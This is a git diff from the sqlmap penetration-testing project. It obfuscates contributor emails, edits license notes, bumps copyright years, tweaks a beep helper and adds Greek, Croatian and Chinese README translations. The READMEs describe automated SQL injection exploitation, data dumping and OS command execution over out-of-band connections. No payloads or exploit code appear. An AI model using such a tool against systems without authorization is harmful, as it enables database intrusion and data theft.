-Vlado Velichkovski, <ketejadam@hotmail.com>
+Vlado Velichkovski, <ketejadam(at)hotmail.com>
 * for reporting considerable amount of bugs
 * for suggesting an enhancement
 
-Johnny Venter, <johnny.venter@zoho.com>
+Johnny Venter, <johnny.venter(at)zoho.com>
 * for reporting a couple of bugs
 
-Carlos Gabriel Vergara, <carlosgabrielvergara@gmail.com>
+Carlos Gabriel Vergara, <carlosgabrielvergara(at)gmail.com>
 * for suggesting couple of good features
 
-Patrick Webster, <patrick@aushack.com>
+Patrick Webster, <patrick(at)aushack.com>
 * for suggesting an enhancement
 
-Ed Williams, <ed.williams@ngssecure.com>
+Ed Williams, <ed.williams(at)ngssecure.com>
 * for suggesting a minor enhancement
 
-Anthony Zboralski, <anthony.zboralski@bellua.com>
+Anthony Zboralski, <anthony.zboralski(at)bellua.com>
 * for providing with detailed feedback
 * for reporting a few minor bugs
 * for donating to sqlmap development
 
-Thierry Zoller, <thierry@zoller.lu>
+Thierry Zoller, <thierry(at)zoller.lu>
 * for reporting a couple of major bugs
 
-Zhen Zhou, <zhouzhenster@gmail.com>
+Zhen Zhou, <zhouzhenster(at)gmail.com>
 * for suggesting a feature
 
--insane-, <insane_@gmx.de>
+-insane-, <insane_(at)gmx.de>
 * for reporting a minor bug
 
-1ndr4 joe, <c0d3w4st3r@gmail.com>
+1ndr4 joe, <c0d3w4st3r(at)gmail.com>
 * for reporting a couple of bugs
 
-abc abc, <biedimc@gmx.net>
+abc abc, <biedimc(at)gmx.net>
 * for reporting a minor bug
 
-Abuse 007, <abuse007@gmail.com>
+Abuse 007, <abuse007(at)gmail.com>
 * for reporting a bug
 
-Alex, <m3zero@gmail.com>
+agix, <florian.gaultier@gmail.com>
+* for contributing the file upload via certutil.exe functionality
+
+Alex, <m3zero(at)gmail.com>
 * for reporting a minor bug
 
-anonymous anonymous, <tmp@2ch.so>
+anonymous anonymous, <tmp(at)2ch.so>
 * for reporting a couple of bugs
 
-bamboo, <roberthacksley@gmail.com>
+bamboo, <roberthacksley(at)gmail.com>
 * for reporting a couple of bugs
 
-Brandon E., <brandonpoc@gmail.com>
+Brandon E., <brandonpoc(at)gmail.com>
 * for reporting a bug
 
-black zero, <timeisflowing@gmail.com>
+black zero, <timeisflowing(at)gmail.com>
 * for reporting a minor bug
 
-blueBoy, <blueboy4444@gmail.com>
+blueBoy, <blueboy4444(at)gmail.com>
 * for reporting a bug
 
-buawig, <buawig@gmail.com>
+buawig, <buawig(at)gmail.com>
 * for reporting considerable amount of bugs
 
-Bugtrace, <bugtrace@gmail.com>
+Bugtrace, <bugtrace(at)gmail.com>
 * for reporting several bugs
 
-cats, <dump@alcor.se>
+cats, <dump(at)alcor.se>
 * for reporting a couple of bugs
 
-Christian S, <christian_s@linuxmail.org>
+Christian S, <christian_s(at)linuxmail.org>
 * for reporting a minor bug
 
-clav, <elclav@gmail.com>
+clav, <elclav(at)gmail.com>
 * for reporting a minor bug
 
-dragoun dash, <dragoun.dash@gmail.com>
+dragoun dash, <dragoun.dash(at)gmail.com>
 * for reporting a minor bug
 
-fufuh, <fufuh@users.sourceforge.net>
+flsf, <jianmaflsf@gmail.com>
+* for contributing WAF scripts 360.py, anquanbao.py, baidu.py, safedog.py
+* for contributing a minor patch
+
+fufuh, <fufuh(at)users.sourceforge.net>
 * for reporting a bug when running on Windows
 
-Hans Wurst, <wurstwass0r@googlemail.com>
+Hans Wurst, <wurstwass0r(at)googlemail.com>
 * for reporting a couple of bugs
 
-james, <james@ev6.net>
+Hysia, <hysia(at)huorui.net>
+* for contributing a Chinese translation of README.md
+
+james, <james(at)ev6.net>
 * for reporting a bug
 
-Joe "Pragmatk", <pragmatk@gmail.com>
+Joe "Pragmatk", <pragmatk(at)gmail.com>
 * for reporting a few bugs
 
-John Smith, <tixos@live.com>
+John Smith, <tixos(at)live.com>
 * for reporting several bugs
 * for suggesting some features
 
-m4l1c3, <malice.anon@gmail.com>
+m4l1c3, <malice.anon(at)gmail.com>
 * for reporting considerable amount of bugs
 
-mariano, <marianoso@gmail.com>
+mariano, <marianoso(at)gmail.com>
 * for reporting a bug
 
-mitchell, <mitchell@tufala.net>
+mitchell, <mitchell(at)tufala.net>
 * for reporting a few bugs
 
-Nadzree, <nadzree@bake180.com>
+Nadzree, <nadzree(at)bake180.com>
 * for reporting a minor bug
 
-nightman, <nightman@email.de>
+nightman, <nightman(at)email.de>
 * for reporting considerable amount of bugs
 
-Oso Dog osodog123@yahoo.com
+Oso Dog osodog123(at)yahoo.com
 * for reporting a minor bug
 
-pacman730, <pacman730@users.sourceforge.net>
+pacman730, <pacman730(at)users.sourceforge.net>
 * for reporting a bug
 
-pentestmonkey, <pentestmonkey@pentestmonkey.net>
+pentestmonkey, <pentestmonkey(at)pentestmonkey.net>
 * for reporting several bugs
 * for suggesting a few minor enhancements
 
-Phat R., <phatthanaphol@gmail.com>
+Phat R., <phatthanaphol(at)gmail.com>
 * for reporting a few bugs
 
-Phil P, <@superevr>
+Phil P, <(at)superevr>
 * for suggesting a minor enhancement
 
-ragos, <ragos@joker.ms>
+ragos, <ragos(at)joker.ms>
 * for reporting a minor bug
 
-rmillet, <rmillet42@gmail.com>
+rmillet, <rmillet42(at)gmail.com>
 * for reporting a bug
 
-Rub3nCT, <rub3nct@gmail.com>
+Rub3nCT, <rub3nct(at)gmail.com>
 * for reporting a minor bug
 
-shiftzwei, <shiftzwei@gmail.com>
+shiftzwei, <shiftzwei(at)gmail.com>
 * for reporting a couple of bugs
 
-smith, <esmyl911@gmail.com>
+smith, <esmyl911(at)gmail.com>
 * for reporting a minor bug
 
-Soma Cruz, <oleg.kupreev@gmail.com>
+Soma Cruz, <oleg.kupreev(at)gmail.com>
 * for reporting a minor bug
 
-Stuffe, <stuffe.dk@gmail.com>
+Spiros94, <cont(at)eyrhka.gr>
+* for contributing a Greek translation of README.md
+
+Stuffe, <stuffe.dk(at)gmail.com>
 * for reporting a minor bug and a feature request
 
-Sylphid, <sylphid.su@sti.com.tw>
+Sylphid, <sylphid.su(at)sti.com.tw>
 * for suggesting some features
 
-syssecurity.info, <syssecurity7@googlemail.com>
+syssecurity.info, <syssecurity7(at)googlemail.com>
 * for reporting a minor bug
 
-This LittlePiggy, <thislittlepiggyhadroastbeef@hotmail.com>
+This LittlePiggy, <thislittlepiggyhadroastbeef(at)hotmail.com>
 * for reporting a minor bug
 
-ToR, <sstidus@email.it>
+ToR, <sstidus(at)email.it>
 * for reporting considerable amount of bugs
 * for suggesting a feature
 
-ultramegaman, <seclists@ultramegaman.com>
+ultramegaman, <seclists(at)ultramegaman.com>
 * for reporting a minor bug
 
-Vinicius, <viniciusmaxdaloop@gmail.com>
+Vinicius, <viniciusmaxdaloop(at)gmail.com>
 * for reporting a minor bug
 
-wanglei, <wanglei@17uxi.cn>
+wanglei, <wanglei(at)17uxi.cn>
 * for reporting a minor bug
 
-warninggp, <warninggp@gmail.com>
+warninggp, <warninggp(at)gmail.com>
 * for reporting a few minor bugs
 
-x, <deep_freeze@mail.ru>
+x, <deep_freeze(at)mail.ru>
 * for reporting a bug
 
-zhouhx, <zhouhx@knownsec.com>
+zhouhx, <zhouhx(at)knownsec.com>
 * for contributing a minor patch
 
 # Organizations
 
-Black Hat team, <info@blackhat.com>
+Black Hat team, <info(at)blackhat.com>
 * for the opportunity to present my research titled 'Advanced SQL injection to operating system full control' at Black Hat Europe 2009 Briefings on April 16, 2009 in Amsterdam (NL). I unveiled and demonstrated some of the sqlmap 0.7 release candidate version new features during my presentation
  * Homepage: http://goo.gl/BKfs7
  * Slides: http://goo.gl/Dh65t
  * White paper: http://goo.gl/spX3N
 
-SOURCE Conference team, <press@sourceconference.com>
+SOURCE Conference team, <press(at)sourceconference.com>
 * for the opportunity to present my research titled 'Expanding the control over the operating system from the database' at SOURCE Conference 2009 on September 21, 2009 in Barcelona (ES). I unveiled and demonstrated some of the sqlmap 0.8 release candidate version new features during my presentation
  * Homepage: http://goo.gl/IeXV4
  * Slides: http://goo.gl/OKnfj
 
-AthCon Conference team, <cfp@athcon.org>
+AthCon Conference team, <cfp(at)athcon.org>
 * for the opportunity to present my research titled 'Got database access? Own the network!' at AthCon Conference 2010 on June 3, 2010 in Athens (GR). I unveiled and demonstrated some of the sqlmap 0.8 version features during my presentation
  * Homepage: http://goo.gl/Fs71I
  * Slides: http://goo.gl/QMfjO
 
-Metasploit Framework development team, <msfdev@metasploit.com>
+Metasploit Framework development team, <msfdev(at)metasploit.com>
 * for their powerful tool Metasploit Framework, used by sqlmap, among others things, to create the shellcode and establish an out-of-band connection between sqlmap and the database server
  * Homepage: http://www.metasploit.com
 
-OWASP Board, <info@owasp.org>
+OWASP Board, <info(at)owasp.org>
 * for sponsoring part of the sqlmap development in the context of OWASP Spring of Code 2007
  * Homepage: http://www.owasp.org
diff --git a/doc/THIRD-PARTY.md b/doc/THIRD-PARTY.md
index 5debfe274..f2479b31a 100644
--- a/doc/THIRD-PARTY.md
+++ b/doc/THIRD-PARTY.md
@@ -20,6 +20,8 @@ This file lists bundled packages and their associated licensing terms.
 * The Oset library located under thirdparty/oset/.
   Copyright (C) 2010, BlueDynamics Alliance, Austria.
   Copyright (C) 2009, Raymond Hettinger, and others.
+* The PrettyPrint library located under thirdparty/prettyprint/.
+  Copyright (C) 2010, Chris Hall.
 * The SocksiPy library located under thirdparty/socks/.
   Copyright (C) 2006, Dan-Haim.
 
@@ -55,7 +57,7 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
   Copyright (C) 2008-2009, Jose Fonseca.
 * The KeepAlive library located under thirdparty/keepalive/.
   Copyright (C) 2002-2003, Michael D. Stenner.
-* The MultipartPost library located under thirdparty/multipartpost/.
+* The MultipartPost library located under thirdparty/multipart/.
   Copyright (C) 2006, Will Holcomb.
 * The XDot library located under thirdparty/xdot/.
   Copyright (C) 2008, Jose Fonseca.
@@ -281,8 +283,6 @@ be bound by the terms and conditions of this License Agreement.
   Copyright (C) 2012, Marcel Hellkamp.
 * The PageRank library located under thirdparty/pagerank/.
   Copyright (C) 2010, Corey Goldberg.
-* The PrettyPrint library located under thirdparty/prettyprint/.
-  Copyright (C) 2010, Chris Hall.
 * The Termcolor library located under thirdparty/termcolor/.
   Copyright (C) 2008-2011, Volvox Development Team.
 
diff --git a/doc/translations/README-gr-GR.md b/doc/translations/README-gr-GR.md
new file mode 100644
index 000000000..8b09ba653
--- /dev/null
+++ b/doc/translations/README-gr-GR.md
@@ -0,0 +1,53 @@
+sqlmap
+==
+
+
+Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
+
+Εικόνες
+----
+
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Μπορείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνύουν κάποια από τα χαρακτηριστικά.
+
+Εγκατάσταση
+----
+
+Έχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Κατά προτίμηση, μπορείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήριο:
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόρμα.
+
+Χρήση
+----
+
+Για να δείτε μια βασική λίστα από επιλογές πατήστε:
+
+    python sqlmap.py -h
+
+Για να πάρετε μια λίστα από όλες τις επιλογές πατήστε:
+
+    python sqlmap.py -hh
+
+Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://gist.github.com/stamparm/5335217).
+Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki).
+
+Σύνδεσμοι
+----
+
+* Αρχική σελίδα: http://sqlmap.org
+* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues
+* Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki
+* Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Εγγραφή σε Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* Mailing list αρχείο: http://news.gmane.org/gmane.comp.security.sqlmap
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-hr-HR.md b/doc/translations/README-hr-HR.md
new file mode 100644
index 000000000..69e2d531d
--- /dev/null
+++ b/doc/translations/README-hr-HR.md
@@ -0,0 +1,53 @@
+sqlmap
+==
+
+
+sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
+
+Slike zaslona
+----
+
+![Slika zaslona](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Možete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od značajki na wiki stranicama.
+
+Instalacija
+----
+
+Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija:
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi.
+
+Korištenje
+----
+
+Kako biste dobili listu osnovnih opcija i prekidača koristite:
+
+    python sqlmap.py -h
+
+Kako biste dobili listu svih opcija i prekidača koristite:
+
+    python sqlmap.py -hh
+
+Možete pronaći primjer izvršavanja [ovdje](https://gist.github.com/stamparm/5335217).
+Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki).
+
+Poveznice
+----
+
+* Početna stranica: http://sqlmap.org
+* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
+* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
+* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Pretplata na mailing listu: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* RSS feed mailing liste: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* Arhiva mailing liste: http://news.gmane.org/gmane.comp.security.sqlmap
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-zh-CN.md b/doc/translations/README-zh-CN.md
new file mode 100644
index 000000000..c3b8b2941
--- /dev/null
+++ b/doc/translations/README-zh-CN.md
@@ -0,0 +1,52 @@
+sqlmap
+==
+
+
+sqlmap 是一个开源的渗透测试工具，可以用来自动化的检测，利用SQL注入漏洞，获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项，包括获取数据库中存储的数据，访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
+
+演示截图
+----
+
+![截图](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+你可以访问 wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看各种用法的演示
+
+安装方法
+----
+
+你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的源代码 或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的源代码.
+
+推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码:
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap 可以运行在 [Python](http://www.python.org/download/)  **2.6.x**  和  **2.7.x** 版本的任何平台上
+
+使用方法
+----
+
+通过如下命令可以查看基本的用法及命令行参数:
+
+    python sqlmap.py -h
+
+通过如下的命令可以查看所有的用法及命令行参数:
+
+    python sqlmap.py -hh
+
+你可以从 [这里](https://gist.github.com/stamparm/5335217) 看到一个sqlmap 的使用样例。除此以外，你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。
+
+链接
+----
+
+* 项目主页: http://sqlmap.org
+* 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki
+* 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* 邮件讨论列表: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* 邮件列表 RSS 订阅: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* 邮件列表归档: http://news.gmane.org/gmane.comp.security.sqlmap
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/extra/__init__.py b/extra/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/extra/__init__.py
+++ b/extra/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/beep/__init__.py b/extra/beep/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/extra/beep/__init__.py
+++ b/extra/beep/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/beep/beep.py b/extra/beep/beep.py
index 49c4deafa..cd8ef9be5 100644
--- a/extra/beep/beep.py
+++ b/extra/beep/beep.py
@@ -3,7 +3,7 @@
 """
 beep.py - Make a beep sound
 
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -45,6 +45,10 @@ def _win_wav_play(filename):
     winsound.PlaySound(filename, winsound.SND_FILENAME)
 
 def _linux_wav_play(filename):
+    for _ in ("aplay", "paplay", "play"):
+        if not os.system("%s '%s' 2>/dev/null" % (_, filename)):
+            return
+
     import ctypes
 
     PA_STREAM_PLAYBACK = 1
diff --git a/extra/cloak/__init__.py b/extra/cloak/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/extra/cloak/__init__.py
+++ b/extra/cloak/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py
index cddc5555a..a94f6756f 100755
--- a/extra/cloak/cloak.py
+++ b/extra/cloak/cloak.py
@@ -3,7 +3,7 @@
 """
 cloak.py - Simple file encryption/compression utility
 
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/dbgtool/__init__.py b/extra/dbgtool/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/extra/dbgtool/__init__.py
+++ b/extra/dbgtool/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/dbgtool/dbgtool.py b/extra/dbgtool/dbgtool.py
index a59797243..4d3dc8c5e 100644
--- a/extra/dbgtool/dbgtool.py
+++ b/extra/dbgtool/dbgtool.py
@@ -3,7 +3,7 @@
 """
 dbgtool.py - Portable executable to ASCII debug script converter
 
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/mssqlsig/update.py b/extra/mssqlsig/update.py
index 902c8ef1e..67d7ee6aa 100644
--- a/extra/mssqlsig/update.py
+++ b/extra/mssqlsig/update.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/safe2bin/__init__.py b/extra/safe2bin/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/extra/safe2bin/__init__.py
+++ b/extra/safe2bin/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/safe2bin/safe2bin.py b/extra/safe2bin/safe2bin.py
index bad03a8d2..c91620ec6 100644
--- a/extra/safe2bin/safe2bin.py
+++ b/extra/safe2bin/safe2bin.py
@@ -3,7 +3,7 @@
 """
 safe2bin.py - Simple safe(hex) to binary format converter
 
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/shutils/duplicates.py b/extra/shutils/duplicates.py
index 641fb8b76..eac95ccf8 100644
--- a/extra/shutils/duplicates.py
+++ b/extra/shutils/duplicates.py
@@ -1,6 +1,6 @@
 #!/usr/bin/env python
 
-# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 # Removes duplicate entries in wordlist like files
diff --git a/extra/shutils/regressiontest.py b/extra/shutils/regressiontest.py
index a080a2af7..415714430 100755
--- a/extra/shutils/regressiontest.py
+++ b/extra/shutils/regressiontest.py
@@ -1,6 +1,6 @@
 #!/usr/bin/env python
 
-# Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 
 import codecs
diff --git a/extra/sqlharvest/__init__.py b/extra/sqlharvest/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/extra/sqlharvest/__init__.py
+++ b/extra/sqlharvest/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/extra/sqlharvest/sqlharvest.py b/extra/sqlharvest/sqlharvest.py
index 84de8d7f0..75dae5093 100644
--- a/extra/sqlharvest/sqlharvest.py
+++ b/extra/sqlharvest/sqlharvest.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/__init__.py b/lib/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/__init__.py
+++ b/lib/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/controller/__init__.py b/lib/controller/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/controller/__init__.py
+++ b/lib/controller/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/controller/action.py b/lib/controller/action.py
index 64150abed..b134cef15 100644
--- a/lib/controller/action.py
+++ b/lib/controller/action.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 5c241b8b2..f4c053ec9 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -15,7 +15,6 @@ from subprocess import Popen as execute
 
 from extra.beep.beep import beep
 from lib.core.agent import agent
-from lib.core.common import arrayizeValue
 from lib.core.common import Backend
 from lib.core.common import extractRegexResult
 from lib.core.common import extractTextTagContent
@@ -46,7 +45,6 @@ from lib.core.datatype import AttribDict
 from lib.core.datatype import InjectionDict
 from lib.core.decorators import cachedmethod
 from lib.core.dicts import FROM_DUMMY_TABLE
-from lib.core.enums import CUSTOM_LOGGING
 from lib.core.enums import DBMS
 from lib.core.enums import HEURISTIC_TEST
 from lib.core.enums import HTTP_HEADER
@@ -54,18 +52,21 @@ from lib.core.enums import HTTPMETHOD
 from lib.core.enums import NULLCONNECTION
 from lib.core.enums import PAYLOAD
 from lib.core.enums import PLACE
+from lib.core.enums import REDIRECTION
 from lib.core.exception import SqlmapConnectionException
 from lib.core.exception import SqlmapNoneDataException
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapUserQuitException
+from lib.core.settings import DEFAULT_GET_POST_DELIMITER
+from lib.core.settings import DUMMY_XSS_CHECK_APPENDIX
 from lib.core.settings import FORMAT_EXCEPTION_STRINGS
 from lib.core.settings import HEURISTIC_CHECK_ALPHABET
 from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
-from lib.core.settings import UNKNOWN_DBMS
+from lib.core.settings import SUPPORTED_DBMS
 from lib.core.settings import URI_HTTP_HEADER
-from lib.core.settings import LOWER_RATIO_BOUND
 from lib.core.settings import UPPER_RATIO_BOUND
 from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
+from lib.core.settings import IDS_WAF_CHECK_RATIO
 from lib.core.threads import getCurrentThreadData
 from lib.request.connect import Connect as Request
 from lib.request.inject import checkBooleanExpression
@@ -84,31 +85,53 @@ def checkSqlInjection(place, parameter, value):
     # Set the flag for SQL injection test mode
     kb.testMode = True
 
